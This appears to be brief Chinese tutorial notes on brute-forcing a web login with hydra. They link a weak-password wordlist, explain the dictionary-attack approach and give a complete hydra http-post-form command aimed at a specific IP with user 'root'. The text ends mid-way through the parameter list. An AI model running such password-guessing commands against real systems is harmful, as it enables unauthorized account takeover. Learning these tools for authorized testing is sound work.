一、hydra位置
二、使用
1、 将密码存在文档中,或从GitHub中获取https://github.com/TgeaUs/Weak-password
2、查看页面请求方式,可参考https://blog.csdn.net/weixin_43039349/article/details/89323846
思路:用hydra向ip58.155.106.35发送POST验证请求,把password字段换成字典中的一条,根据服务端的回复验证密码是否正确。然后循环验证字典中的密码
hydra -t 1 -l root -P cyzidian.txt -o out.txt -vV -f 58.155.106.35 http-post-form "/:username=^USER^&password=^PASS^:error"
3、提高爆破速度:采用多线程python爆破,暂未尝试~
三、参数说明
参考其他文章:
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] |